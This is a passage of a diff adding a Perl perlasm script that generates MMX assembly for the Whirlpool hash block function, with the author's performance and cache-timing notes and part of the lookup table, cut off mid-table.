+*SCALE=\(2); # 2 or 8, that is the question:-) Value of 8 results
+# in 16KB large table, which is tough on L1 cache, but eliminates
+# unaligned references to it. Value of 2 results in 4KB table, but
+# 7/8 of references to it are unaligned. AMD cores seem to be
+# allergic to the latter, while Intel ones - to former [see the
+# table]. I stick to value of 2 for two reasons: 1. smaller table
+# minimizes cache trashing and thus mitigates the hazard of side-
+# channel leakage similar to AES cache-timing one; 2. performance
+# gap among different µ-archs is smaller.
+#
+# Performance table lists rounded amounts of CPU cycles spent by
+# whirlpool_block_mmx routine on single 64 byte input block, i.e.
+# smaller is better and asymptotic throughput can be estimated by
+# multiplying 64 by CPU clock frequency and dividing by relevant
+# value from the given table:
+#
+#		$SCALE=2/8	icc8	gcc3	
+# Intel P4	3200/4600	4600(*)	6400
+# Intel PIII	2900/3000	4900	5400
+# AMD K[78]	2500/1800	9900	8200(**)
+#
+# (*)	I've sketched even non-MMX assembler, but for the record
+#	I've failed to beat the Intel compiler on P4, without using
+#	MMX that is...
+# (**)	... on AMD on the other hand non-MMX assembler was observed
+#	to perform significantly better, but I figured this MMX
+#	implementation is even faster anyway, so why bother? As for
+#	pre-MMX AMD core[s], the improvement coefficient is more
+#	than likely to vary anyway and I don't know how. But the
+#	least I know is that gcc-generated code compiled with
+#	-DL_ENDIAN and -DOPENSSL_SMALL_FOOTPRINT [see C module for
+#	details] and optimized for Pentium was observed to perform
+#	*better* on Pentium 100 than unrolled non-MMX assembler
+#	loop... So we just say that I don't know if maintaining
+#	non-MMX implementation would actually pay off, but till
+#	opposite is proved "unlikely" is assumed.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"wp-mmx.pl");
+
+sub L()  { &data_byte(@_); }
+sub LL()
+{	if	($SCALE==2)	{ &data_byte(@_); &data_byte(@_); }
+	elsif	($SCALE==8)	{ for ($i=0;$i<8;$i++) {
+					&data_byte(@_);
+					unshift(@_,pop(@_));
+				  }
+				}
+	else			{ die "unvalid SCALE value"; }
+}
+
+sub scale()
+{	if	($SCALE==2)	{ &lea(@_[0],&DWP(0,@_[1],@_[1])); }
+	elsif	($SCALE==8)	{ &lea(@_[0],&DWP(0,"",@_[1],8));  }
+	else			{ die "unvalid SCALE value";       }
+}
+
+sub row()
+{	if	($SCALE==2)	{ ((8-shift)&7); }
+	elsif	($SCALE==8)	{ (8*shift);     }
+	else			{ die "unvalid SCALE value"; }
+}
+
+$tbl="ebp";
+@mm=("mm0","mm1","mm2","mm3","mm4","mm5","mm6","mm7");
+
+&function_begin_B("whirlpool_block_mmx");
+	&push	("ebp");
+	&push	("ebx");
+	&push	("esi");
+	&push	("edi");
+
+	&mov	("esi",&wparam(0));		# hash value
+	&mov	("edi",&wparam(1));		# input data stream
+	&mov	("ebp",&wparam(2));		# number of chunks in input
+
+	&mov	("eax","esp");			# copy stack pointer
+	&sub	("esp",128+20);			# allocate frame
+	&and	("esp",-64);			# align for cache-line
+
+	&lea	("ebx",&DWP(128,"esp"));
+	&mov	(&DWP(0,"ebx"),"esi");		# save parameter block
+	&mov	(&DWP(4,"ebx"),"edi");
+	&mov	(&DWP(8,"ebx"),"ebp");
+	&mov	(&DWP(16,"ebx"),"eax");		# saved stack pointer
+
+	&call	(&label("pic_point"));
+&set_label("pic_point");
+	&blindpop($tbl);
+	&lea	($tbl,&DWP(&label("table")."-".&label("pic_point"),$tbl));
+
+	&xor	("ecx","ecx");
+	&xor	("edx","edx");
+
+	for($i=0;$i<8;$i++) { &movq(@mm[$i],&QWP($i*8,"esi")); }    # L=H
+&set_label("outerloop");
+	for($i=0;$i<8;$i++) { &movq(&QWP($i*8,"esp"),@mm[$i]); }    # K=L
+	for($i=0;$i<8;$i++) { &pxor(@mm[$i],&QWP($i*8,"edi")); }    # L^=inp
+	for($i=0;$i<8;$i++) { &movq(&QWP(64+$i*8,"esp"),@mm[$i]); } # S=L
+
+	&xor	("esi","esi");
+	&mov	(&DWP(12,"ebx"),"esi");		# zero round counter
+
+&set_label("round",16);
+	&movq	(@mm[0],&QWP(2048*$SCALE,$tbl,"esi",8));	# rc[r]
+	&mov	("eax",&DWP(0,"esp"));
+	&mov	("ebx",&DWP(4,"esp"));
+	&movz	("ecx",&LB("eax"));
+	&movz	("edx",&HB("eax"));
+for($i=0;$i<8;$i++) {
+    my $func = ($i==0)? \&movq : \&pxor;
+	&shr	("eax",16);
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("eax"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("eax"));
+	&pxor	(@mm[0],&QWP(&row(0),$tbl,"esi",8));
+	&$func	(@mm[1],&QWP(&row(1),$tbl,"edi",8));
+	&mov	("eax",&DWP(($i+1)*8,"esp"));
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("ebx"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("ebx"));
+	&$func	(@mm[2],&QWP(&row(2),$tbl,"esi",8));
+	&$func	(@mm[3],&QWP(&row(3),$tbl,"edi",8));
+	&shr	("ebx",16);
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("ebx"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("ebx"));
+	&$func	(@mm[4],&QWP(&row(4),$tbl,"esi",8));
+	&$func	(@mm[5],&QWP(&row(5),$tbl,"edi",8));
+	&mov	("ebx",&DWP(($i+1)*8+4,"esp"));
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("eax"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("eax"));
+	&$func	(@mm[6],&QWP(&row(6),$tbl,"esi",8));
+	&$func	(@mm[7],&QWP(&row(7),$tbl,"edi",8));
+    push(@mm,shift(@mm));
+}
+
+	for($i=0;$i<8;$i++) { &movq(&QWP($i*8,"esp"),@mm[$i]); }    # K=L
+
+for($i=0;$i<8;$i++) {
+	&shr	("eax",16);
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("eax"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("eax"));
+	&pxor	(@mm[0],&QWP(&row(0),$tbl,"esi",8));
+	&pxor	(@mm[1],&QWP(&row(1),$tbl,"edi",8));
+	&mov	("eax",&DWP(64+($i+1)*8,"esp"))		if ($i<7);
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("ebx"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("ebx"));
+	&pxor	(@mm[2],&QWP(&row(2),$tbl,"esi",8));
+	&pxor	(@mm[3],&QWP(&row(3),$tbl,"edi",8));
+	&shr	("ebx",16);
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("ebx"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("ebx"));
+	&pxor	(@mm[4],&QWP(&row(4),$tbl,"esi",8));
+	&pxor	(@mm[5],&QWP(&row(5),$tbl,"edi",8));
+	&mov	("ebx",&DWP(64+($i+1)*8+4,"esp"))	if ($i<7);
+	&scale	("esi","ecx");
+	&movz	("ecx",&LB("eax"));
+	&scale	("edi","edx");
+	&movz	("edx",&HB("eax"));
+	&pxor	(@mm[6],&QWP(&row(6),$tbl,"esi",8));
+	&pxor	(@mm[7],&QWP(&row(7),$tbl,"edi",8));
+    push(@mm,shift(@mm));
+}
+	&lea	("ebx",&DWP(128,"esp"));
+	&mov	("esi",&DWP(12,"ebx"));		# pull round counter
+	&add	("esi",1);
+	&cmp	("esi",10);
+	&je	(&label("roundsdone"));
+
+	&mov	(&DWP(12,"ebx"),"esi");		# update round counter
+	for($i=0;$i<8;$i++) { &movq(&QWP(64+$i*8,"esp"),@mm[$i]); } # S=L
+	&jmp	(&label("round"));
+
+&set_label("roundsdone",16);
+	&mov	("esi",&DWP(0,"ebx"));		# reload argument block
+	&mov	("edi",&DWP(4,"ebx"));
+	&mov	("eax",&DWP(8,"ebx"));
+
+	for($i=0;$i<8;$i++) { &pxor(@mm[$i],&QWP($i*8,"edi")); }    # L^=inp
+	for($i=0;$i<8;$i++) { &pxor(@mm[$i],&QWP($i*8,"esi")); }    # L^=H
+	for($i=0;$i<8;$i++) { &movq(&QWP($i*8,"esi"),@mm[$i]); }    # H=L
+
+	&lea	("edi",&DWP(64,"edi"));		# inp+=64
+	&sub	("eax",1);			# num--
+	&jz	(&label("alldone"));
+	&mov	(&DWP(4,"ebx"),"edi");		# update argument block
+	&mov	(&DWP(8,"ebx"),"eax");
+	&jmp	(&label("outerloop"));
+
+&set_label("alldone");
+	&emms	();
+	&mov	("esp",&DWP(16,"ebx"));		# restore saved stack pointer
+	&pop	("edi");
+	&pop	("esi");
+	&pop	("ebx");
+	&pop	("ebp");
+	&ret	();
+
+&align(64);
+&set_label("table");
+	&LL(0x18,0x18,0x60,0x18,0xc0,0x78,0x30,0xd8);
+	&LL(0x23,0x23,0x8c,0x23,0x05,0xaf,0x46,0x26);
+	&LL(0xc6,0xc6,0x3f,0xc6,0x7e,0xf9,0x91,0xb8);
+	&LL(0xe8,0xe8,0x87,0xe8,0x13,0x6f,0xcd,0xfb);
+	&LL(0x87,0x87,0x26,0x87,0x4c,0xa1,0x13,0xcb);
+	&LL(0xb8,0xb8,0xda,0xb8,0xa9,0x62,0x6d,0x11);
+	&LL(0x01,0x01,0x04,0x01,0x08,0x05,0x02,0x09);
+	&LL(0x4f,0x4f,0x21,0x4f,0x42,0x6e,0x9e,0x0d);
+	&LL(0x36,0x36,0xd8,0x36,0xad,0xee,0x6c,0x9b);
+	&LL(0xa6,0xa6,0xa2,0xa6,0x59,0x04,0x51,0xff);
+	&LL(0xd2,0xd2,0x6f,0xd2,0xde,0xbd,0xb9,0x0c);
+	&LL(0xf5,0xf5,0xf3,0xf5,0xfb,0x06,0xf7,0x0e);
+	&LL(0x79,0x79,0xf9,0x79,0xef,0x80,0xf2,0x96);
+	&LL(0x6f,0x6f,0xa1,0x6f,0x5f,0xce,0xde,0x30);
+	&LL(0x91,0x91,0x7e,0x91,0xfc,0xef,0x3f,0x6d);
+	&LL(0x52,0x52,0x55,0x52,0xaa,0x07,0xa4,0xf8);
+	&LL(0x60,0x60,0x9d,0x60,0x27,0xfd,0xc0,0x47);
+	&LL(0xbc,0xbc,0xca,0xbc,0x89,0x76,0x65,0x35);
+	&LL(0x9b,0x9b,0x56,0x9b,0xac,0xcd,0x2b,0x37);
+	&LL(0x8e,0x8e,0x02,0x8e,0x04,0x8c,0x01,0x8a);
+	&LL(0xa3,0xa3,0xb6,0xa3,0x71,0x15,0x5b,0xd2);
+	&LL(0x0c,0x0c,0x30,0x0c,0x60,0x3c,0x18,0x6c);
+	&LL(0x7b,0x7b,0xf1,0x7b,0xff,0x8a,0xf6,0x84);
+	&LL(0x35,0x35,0xd4,0x35,0xb5,0xe1,0x6a,0x80);
+	&LL(0x1d,0x1d,0x74,0x1d,0xe8,0x69,0x3a,0xf5);
+	&LL(0xe0,0xe0,0xa7,0xe0,0x53,0x47,0xdd,0xb3);
+	&LL(0xd7,0xd7,0x7b,0xd7,0xf6,0xac,0xb3,0x21);
+	&LL(0xc2,0xc2,0x2f,0xc2,0x5e,0xed,0x99,0x9c);
+	&LL(0x2e,0x2e,0xb8,0x2e,0x6d,0x96,0x5c,0x43);
+	&LL(0x4b,0x4b,0x31,0x4b,0x62,0x7a,0x96,0x29);
+	&LL(0xfe,0xfe,0xdf,0xfe,0xa3,0x21,0xe1,0x5d);
+	&LL(0x57,0x57,0x41,0x57,0x82,0x16,0xae,0xd5);
+	&LL(0x15,0x15,0x54,0x15,0xa8,0x41,0x2a,0xbd);
+	&LL(0x77,0x77,0xc1,0x77,0x9f,0xb6,0xee,0xe8);
+	&LL(0x37,0x37,0xdc,0x37,0xa5,0xeb,0x6e,0x92);
+	&LL(0xe5,0xe5,0xb3,0xe5,0x7b,0x56,0xd7,0x9e);
+	&LL(0x9f,0x9f,0x46,0x9f,0x8c,0xd9,0x23,0x13);
+	&LL(0xf0,0xf0,0xe7,0xf0,0xd3,0x17,0xfd,0x23);
+	&LL(0x4a,0x4a,0x35,0x4a,0x6a,0x7f,0x94,0x20);
+	&LL(0xda,0xda,0x4f,0xda,0x9e,0x95,0xa9,0x44);
+	&LL(0x58,0x58,0x7d,0x58,0xfa,0x25,0xb0,0xa2);
+	&LL(0xc9,0xc9,0x03,0xc9,0x06,0xca,0x8f,0xcf);
+	&LL(0x29,0x29,0xa4,0x29,0x55,0x8d,0x52,0x7c);
+	&LL(0x0a,0x0a,0x28,0x0a,0x50,0x22,0x14,0x5a);
+	&LL(0xb1,0xb1,0xfe,0xb1,0xe1,0x4f,0x7f,0x50);
+	&LL(0xa0,0xa0,0xba,0xa0,0x69,0x1a,0x5d,0xc9);
+	&LL(0x6b,0x6b,0xb1,0x6b,0x7f,0xda,0xd6,0x14);
+	&LL(0x85,0x85,0x2e,0x85,0x5c,0xab,0x17,0xd9);
+	&LL(0xbd,0xbd,0xce,0xbd,0x81,0x73,0x67,0x3c);
+	&LL(0x5d,0x5d,0x69,0x5d,0xd2,0x34,0xba,0x8f);
+	&LL(0x10,0x10,0x40,0x10,0x80,0x50,0x20,0x90);
+	&LL(0xf4,0xf4,0xf7,0xf4,0xf3,0x03,0xf5,0x07);
+	&LL(0xcb,0xcb,0x0b,0xcb,0x16,0xc0,0x8b,0xdd);
+	&LL(0x3e,0x3e,0xf8,0x3e,0xed,0xc6,0x7c,0xd3);
+	&LL(0x05,0x05,0x14,0x05,0x28,0x11,0x0a,0x2d);
+	&LL(0x67,0x67,0x81,0x67,0x1f,0xe6,0xce,0x78);
+	&LL(0xe4,0xe4,0xb7,0xe4,0x73,0x53,0xd5,0x97);
+	&LL(0x27,0x27,0x9c,0x27,0x25,0xbb,0x4e,0x02);
+	&LL(0x41,0x41,0x19,0x41,0x32,0x58,0x82,0x73);
+	&LL(0x8b,0x8b,0x16,0x8b,0x2c,0x9d,0x0b,0xa7);
+	&LL(0xa7,0xa7,0xa6,0xa7,0x51,0x01,0x53,0xf6);
+	&LL(0x7d,0x7d,0xe9,0x7d,0xcf,0x94,0xfa,0xb2);
+	&LL(0x95,0x95,0x6e,0x95,0xdc,0xfb,0x37,0x49);
+	&LL(0xd8,0xd8,0x47,0xd8,0x8e,0x9f,0xad,0x56);
+	&LL(0xfb,0xfb,0xcb,0xfb,0x8b,0x30,0xeb,0x70);
+	&LL(0xee,0xee,0x9f,0xee,0x23,0x71,0xc1,0xcd);
+	&LL(0x7c,0x7c,0xed,0x7c,0xc7,0x91,0xf8,0xbb);
+	&LL(0x66,0x66,0x85,0x66,0x17,0xe3,0xcc,0x71);
+	&LL(0xdd,0xdd,0x53,0xdd,0xa6,0x8e,0xa7,0x7b);
+	&LL(0x17,0x17,0x5c,0x17,0xb8,0x4b,0x2e,0xaf);
+	&LL(0x47,0x47,0x01,0x47,0x02,0x46,0x8e,0x45);
+	&LL(0x9e,0x9e,0x42,0x9e,0x84,0xdc,0x21,0x1a);
+	&LL(0xca,0xca,0x0f,0xca,0x1e,0xc5,0x89,0xd4);
+	&LL(0x2d,0x2d,0xb4,0x2d,0x75,0x99,0x5a,0x58);
+	&LL(0xbf,0xbf,0xc6,0xbf,0x91,0x79,0x63,0x2e);
+	&LL(0x07,0x07,0x1c,0x07,0x38,0x1b,0x0e,0x3f);
+	&LL(0xad,0xad,0x8e,0xad,0x01,0x23,0x47,0xac);
+	&LL(0x5a,0x5a,0x75,0x5a,0xea,0x2f,0xb4,0xb0);
+	&LL(0x83,0x83,0x36,0x83,0x6c,0xb5,0x1b,0xef);
+	&LL(0x33,0x33,0xcc,0x33,0x85,0xff,0x66,0xb6);
+	&LL(0x63,0x63,0x91,0x63,0x3f,0xf2,0xc6,0x5c);
+	&LL(0x02,0x02,0x08,0x02,0x10,0x0a,0x04,0x12);
+	&LL(0xaa,0xaa,0x92,0xaa,0x39,0x38,0x49,0x93);
+	&LL(0x71,0x71,0xd9,0x71,0xaf,0xa8,0xe2,0xde);
+	&LL(0xc8,0xc8,0x07,0xc8,0x0e,0xcf,0x8d,0xc6);
+	&LL(0x19,0x19,0x64,0x19,0xc8,0x7d,0x32,0xd1);
+	&LL(0x49,0x49,0x39,0x49,0x72,0x70,0x92,0x3b);
+	&LL(0xd9,0xd9,0x43,0xd9,0x86,0x9a,0xaf,0x5f);
+	&LL(0xf2,0xf2,0xef,0xf2,0xc3,0x1d,0xf9,0x31);
+	&LL(0xe3,0xe3,0xab,0xe3,0x4b,0x48,0xdb,0xa8);
+	&LL(0x5b,0x5b,0x71,0x5b,0xe2,0x2a,0xb6,0xb9);
+	&LL(0x88,0x88,0x1a,0x88,0x34,0x92,0x0d,0xbc);
+	&LL(0x9a,0x9a,0x52,0x9a,0xa4,0xc8,0x29,0x3e);
+	&LL(0x26,0x26,0x98,0x26,0x2d,0xbe,0x4c,0x0b);
+	&LL(0x32,0x32,0xc8,0x32,0x8d,0xfa,0x64,0xbf);
+	&LL(0xb0,0xb0,0xfa,0xb0,0xe9,0x4a,0x7d,0x59);
+	&LL(0xe9,0xe9,0x83,0xe9,0x1b,0x6a,0xcf,0xf2);
+	&LL(0x0f,0x0f,0x3c,0x0f,0x78,0x33,0x1e,0x77);
+	&LL(0xd5,0xd5,0x73,0xd5,0xe6,0xa6,0xb7,0x33);
+	&LL(0x80,0x80,0x3a,0x80,0x74,0xba,0x1d,0xf4);
+	&LL(0xbe,0xbe,0xc2,0xbe,0x99,0x7c,0x61,0x27);
+	&LL(0xcd,0xcd,0x13,0xcd,0x26,0xde,0x87,0xeb);
+	&LL(0x34,0x34,0xd0,0x34,0xbd,0xe4,0x68,0x89);
+	&LL(0x48,0x48,0x3d,0x48,0x7a,0x75,0x90,0x32);
+	&LL(0xff,0xff,0xdb,0xff,0xab,0x24,0xe3,0x54);
+	&LL(0x7a,0x7a,0xf5,0x7a,0xf7,0x8f,0xf4,0x8d);
+	&LL(0x90,0x90,0x7a,0x90,0xf4,0xea,0x3d,0x64);
+	&LL(0x5f,0x5f,0x61,0x5f,0xc2,0x3e,0xbe,0x9d);
+	&LL(0x20,0x20,0x80,0x20,0x1d,0xa0,0x40,0x3d);
+	&LL(0x68,0x68,0xbd,0x68,0x67,0xd5,0xd0,0x0f);
+	&LL(0x1a,0x1a,0x68,0x1a,0xd0,0x72,0x34,0xca);
+	&LL(0xae,0xae,0x82,0xae,0x19,0x2c,0x41,0xb7);
+	&LL(0xb4,0xb4,0xea,0xb4,0xc9,0x5e,0x75,0x7d);
+	&LL(0x54,0x54,0x4d,0x54,0x9a,0x19,0xa8,0xce);
+	&LL(0x93,0x93,0x76,0x93,0xec,0xe5,0x3b,0x7f);
+	&LL(0x22,0x22,0x88,0x22,0x0d,0xaa,0x44,0x2f);
+	&LL(0x64,0x64,0x8d,0x64,0x07,0xe9,0xc8,0x63);
+	&LL(0xf1,0xf1,0xe3,0xf1,0xdb,0x12,0xff,0x2a);
+	&LL(0x73,0x73,0xd1,0x73,0xbf,0xa2,0xe6,0xcc);
+	&LL(0x12,0x12,0x48,0x12,0x90,0x5a,0x24,0x82);
+	&LL(0x40,0x40,0x1d,0x40,0x3a,0x5d,0x80,0x7a);
+	&LL(0x08,0x08,0x20,0x08,0x40,0x28,0x10,0x48);
+	&LL(0xc3,0xc3,0x2b,0xc3,0x56,0xe8,0x9b,0x95);
+	&LL(0xec,0xec,0x97,0xec,0x33,0x7b,0xc5,0xdf);
+	&LL(0xdb,0xdb,0x4b,0xdb,0x96,0x90,0xab,0x4d);
+	&LL(0xa1,0xa1,0xbe,0xa1,0x61,0x1f,0x5f,0xc0);
+	&LL(0x8d,0x8d,0x0e,0x8d,0x1c,0x83,0x07,0x91);
+	&LL(0x3d,0x3d,0xf4,0x3d,0xf5,0xc9,0x7a,0xc8);
+	&LL(0x97,0x97,0x66,0x97,0xcc,0xf1,0x33,0x5b);
+	&LL(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
+	&LL(0xcf,0xcf,0x1b,0xcf,0x36,0xd4,0x83,0xf9);
+	&LL(0x2b,0x2b,0xac,0x2b,0x45,0x87,0x56,0x6e);
+	&LL(0x76,0x76,0xc5,0x76,0x97,0xb3,0xec,0xe1);
+	&LL(0x82,0x82,0x32,0x82,0x64,0xb0,0x19,0xe6);
+	&LL(0xd6,0xd6,0x7f,0xd6,0xfe,0xa9,0xb1,0x28);
+	&LL(0x1b,0x1b,0x6c,0x1b,0xd8,0x77,0x36,0xc3);
+	&LL(0xb5,0xb5,0xee,0xb5,0xc1,0x5b,0x77,0x74);
+	&LL(0xaf,0xaf,0x86,0xaf,0x11,0x29,0x43,0xbe);
+	&LL(0x6a,0x6a,0xb5,0x6a,0x77,0xdf,0xd4,0x1d);
+	&LL(0x50,0x50,0x5d,0x50,0xba,0x0d,0xa0,0xea);
+	&LL(0x45,0x45,0x09,0x45,0x12,0x4c,0x8a,0x57);
+	&LL(0xf3,0xf3,0xeb,0xf3,0xcb,0x18,0xfb,0x38);
+	&LL(0x30,0x30,0xc0,0x30,0x9d,0xf0,0x60,0xad);
+	&LL(0xef,0xef,0x9b,0xef,0x2b,0x74,0xc3,0xc4);
+	&LL(0x3f,0x3f,0xfc,0x3f,0xe5,0xc3,0x7e,0xda);
+	&LL(0x55,0x55,0x49,0x55,0x92,0x1c,0xaa,0xc7);
+	&LL(0xa2,0xa2,0xb2,0xa2,0x79,0x10,0x59,0xdb);
+	&LL(0xea,0xea,0x8f,0xea,0x03,0x65,0xc9,0xe9);
+	&LL(0x65,0x65,0x89,0x65,0x0f,0xec,0xca,0x6a);
+	&LL(0xba,0xba,0xd2,0xba,0xb9,0x68,0x69,0x03);
+	&LL(0x2f,0x2f,0xbc,0x2f,0x65,0x93,0x5e,0x4a);
+	&LL(0xc0,0xc0,0x27,0xc0,0x4e,0xe7,0x9d,0x8e);
+	&LL(0xde,0xde,0x5f,0xde,0xbe,0x81,0xa1,0x60);
+	&LL(0x1c,0x1c,0x70,0x1c,0xe0,0x6c,0x38,0xfc);
+	&LL(0xfd,0xfd,0xd3,0xfd,0xbb,0x2e,0xe7,0x46);
+	&LL(0x4d,0x4d,0x29,0x4d,0x52,0x64,0x9a,0x1f);
+	&LL(0x92,0x92,0x72,0x92,0xe4,0xe0,0x39,0x76);
+	&LL(0x75,0x75,0xc9,0x75,0x8f,0xbc,0xea,0xfa);
+	&LL(0x06,0x06,0x18,0x06,0x30,0x1e,0x0c,0x36);
+	&LL(0x8a,0x8a,0x12,0x8a,0x24,0x98,0x09,0xae);
+	&LL(0xb2,0xb2,0xf2,0xb2,0xf9,0x40,0x79,0x4b);
+	&LL(0xe6,0xe6,0xbf,0xe6,0x63,0x59,0xd1,0x85);
+	&LL(0x0e,0x0e,0x38,0x0e,0x70,0x36,0x1c,0x7e);
+	&LL(0x1f,0x1f,0x7c,0x1f,0xf8,0x63,0x3e,0xe7);
+	&LL(0x62,0x62,0x95,0x62,0x37,0xf7,0xc4,0x55);
+	&LL(0xd4,0xd4,0x77,0xd4,0xee,0xa3,0xb5,0x3a);
+	&LL(0xa8,0xa8,0x9a,0xa8,0x29,0x32,0x4d,0x81);
+	&LL(0x96,0x96,0x62,0x96,0xc4,0xf4,0x31,0x52);
+	&LL(0xf9,0xf9,0xc3,0xf9,0x9b,0x3a,0xef,0x62);
+	&LL(0xc5,0xc5,0x33,0xc5,0x66,0xf6,0x97,0xa3);
+	&LL(0x25,0x25,0x94,0x25,0x35,0xb1,0x4a,0x10);
+	&LL(0x59,0x59,0x79,0x59,0xf2,0x20,0xb2,0xab);
+	&LL(0x84,0x84,0x2a,0x84,0x54,0xae,0x15,0xd0);
+	&LL(0x72,0x72,0xd5,0x72,0xb7,0xa7,0xe4,0xc5);
+	&LL(0x39,0x39,0xe4,0x39,0xd5,0xdd,0x72,0xec);
+	&LL(0x4c,0x4c,0x2d,0x4c,0x5a,0x61,0x98,0x16);
+	&LL(0x5e,0x5e,0x65,0x5e,0xca,0x3b,0xbc,0x94);
+	&LL(0x78,0x78,0xfd,0x78,0xe7,0x85,0xf0,0x9f);
+	&LL(0x38,0x38,0xe0,0x38,0xdd,0xd8,0x70,0xe5);
+	&LL(0x8c,0x8c,0x0a,0x8c,0x14,0x86,0x05,0x98);
+	&LL(0xd1,0xd1,0x63,0xd1,0xc6,0xb2,0xbf,0x17);
+	&LL(0xa5,0xa5,0xae,0xa5,0x41,0x0b,0x57,0xe4);
+	&LL(0xe2,0xe2,0xaf,0xe2,0x43,0x4d,0xd9,0xa1);
+	&LL(0x61,0x61,0x99,0x61,0x2f,0xf8,0xc2,0x4e);
+	&LL(0xb3,0xb3,0xf6,0xb3,0xf1,0x45,0x7b,0x42);
+	&LL(0x21,0x21,0x84,0x21,0x15,0xa5,0x42,0x34);
+	&LL(0x9c,0x9c,0x4a,0x9c,0x94,0xd6,0x25,0x08);
+	&LL(0x1e,0x1e,0x78,0x1e,0xf0,0x66,0x3c,0xee);
+	&LL(0x43,0x43,0x11,0x43,0x22,0x52,0x86,0x61);
+	&LL(0xc7,0xc7,0x3b,0xc7,0x76,0xfc,0x93,0xb1);
+	&LL(0xfc,0xfc,0xd7,0xfc,0xb3,0x2b,0xe5,0x4f);
+	&LL(0x04,0x04,0x10,0x04,0x20,0x14,0x08,0x24);
+	&LL(0x51,0x51,0x59,0x51,0xb2,0x08,0xa2,0xe3);
+	&LL(0x99,0x99,0x5e,0x99,0xbc,0xc7,0x2f,0x25);
+	&LL(0x6d,0x6d,0xa9,0x6d,0x4f,0xc4,0xda,0x22);
+	&LL(0x0d,0x0d,0x34,0x0d,0x68,0x39,0x1a,0x65);
+	&LL(0xfa,0xfa,0xcf,0xfa,0x83,0x35,0xe9,0x79);
+	&LL(0xdf,0xdf,0x5b,0xdf,0xb6,0x84,0xa3,0x69);
+	&LL(0x7e,0x7e,0xe5,0x7e,0xd7,0x9b,0xfc,0xa9);
+	&LL(0x24,0x24,0x90,0x24,0x3d,0xb4,0x48,0x19);
+	&LL(0x3b,0x3b,0xec,0x3b,0xc5,0xd7,0x76,0xfe);
+	&LL(0xab,0xab,0x96,0xab,0x31,0x3d,0x4b,0x9a);
+	&LL(0xce,0xce,0x1f,0xce,0x3e,0xd1,0x81,0xf0);
+	&LL(0x11,0x11,0x44,0x11,0x88,0x55,0x22,0x99);
+	&LL(0x8f,0x8f,0x06,0x8f,0x0c,0x89,0x03,0x83);
+	&LL(0x4e,0x4e,0x25,0x4e,0x4a,0x6b,0x9c,0x04);
+	&LL(0xb7,0xb7,0xe6,0xb7,0xd1,0x51,0x73,0x66);
+	&LL(0xeb,0xeb,0x8b,0xeb,0x0b,0x60,0xcb,0xe0);
+	&LL(0x3c,0x3c,0xf0,0x3c,0xfd,0xcc,0x78,0xc1);
+	&LL(0x81,0x81,0x3e,0x81,0x7c,0xbf,0x1f,0xfd);
+	&LL(0x94,0x94,0x6a,0x94,0xd4,0xfe,0x35,0x40);
+	&LL(0xf7,0xf7,0xfb,0xf7,0xeb,0x0c,0xf3,0x1c);
+	&LL(0xb9,0xb9,0xde,0xb9,0xa1,0x67,0x6f,0x18);
+	&LL(0x13,0x13,0x4c,0x13,0x98,0x5f,0x26,0x8b);
+	&LL(0x2c,0x2c,0xb0,0x2c,0x7d,0x9c,0x58,0x51);
+	&LL(0xd3,0xd3,0x6b,0xd3,0xd6,0xb8,0xbb,0x05);
+	&LL(0xe7,0xe7,0xbb,0xe7,0x6b,0x5c,0xd3,0x8c);
+	&LL(0x6e,0x6e,0xa5,0x6e,0x57,0xcb,0xdc,0x39);
+	&LL(0xc4,0xc4,0x37,0xc4,0x6e,0xf3,0x95,0xaa);
+	&LL(0x03,0x03,0x0c,0x03,0x18,0x0f,0x06,0x1b);
+	&LL(0x56,0x56,0x45,0x56,0x8a,0x13,0xac,0xdc);
+	&LL(0x44,0x44,0x0d,0x44,0x1a,0x49,0x88,0x5e);
+	&LL(0x7f,0x7f,0xe1,0x7f,0xdf,0x9e,0xfe,0xa0);
+	&LL(0xa9,0xa9,0x9e,0xa9,0x21,0x37,0x4f,0x88);
+	&LL(0x2a,0x2a,0xa8,0x2a,0x4d,0x82,0x54,0x67);
+	&LL(0xbb,0xbb,0xd6,0xbb,0xb1,0x6d,0x6b,0x0a);
+	&LL(0xc1,0xc1,0x23,0xc1,0x46,0xe2,0x9f,0x87);
+	&LL(0x53,0x53,0x51,0x53,0xa2,0x02,0xa6,0xf1);
+	&LL(0xdc,0xdc,0x57,0xdc,0xae,0x8b,0xa5,0x72);
+	&LL(0x0b,0x0b,0x2c,0x0b,0x58,0x27,0x16,0x53);
+	&LL(0x9d,0x9d,0x4e,0x9d,0x9c,0xd3,0x27,0x01);
+	&LL(0x6c,0x6c,0xad,0x6c,0x47,0xc1,0xd8,0x2b);
+	&LL(0x31,0x31,0xc4,0x31,0x95,0xf5,0x62,0xa4);
+	&LL(0x74,0x74,0xcd,0x74,0x87,0xb9,0xe8,0xf3);
+	&LL(0xf6,0xf6,0xff,0xf6,0xe3,0x09,0xf1,0x15);
+	&LL(0x46,0x46,0x05,0x46,0x0a,0x43,0x8c,0x4c);
+	&LL(0xac,0xac,0x8a,0xac,0x09,0x26,0x45,0xa5);
+	&LL(0x89,0x89,0x1e,0x89,0x3c,0x97,0x0f,0xb5);
+	&LL(0x14,0x14,0x50,0x14,0xa0,0x44,0x28,0xb4);
+	&LL(0xe1,0xe1,0xa3,0xe1,0x5b,0x42,0xdf,0xba);
+	&LL(0x16,0x16,0x58,0x16,0xb0,0x4e,0x2c,0xa6);
+	&LL(0x3a,0x3a,0xe8,0x3a,0xcd,0xd2,0x74,0xf7);
+	&LL(0x69,0x69,0xb9,0x69,0x6f,0xd0,0xd2,0x06);
+	&LL(0x09,0x09,0x24,0x09,0x48,0x2d,0x12,0x41);
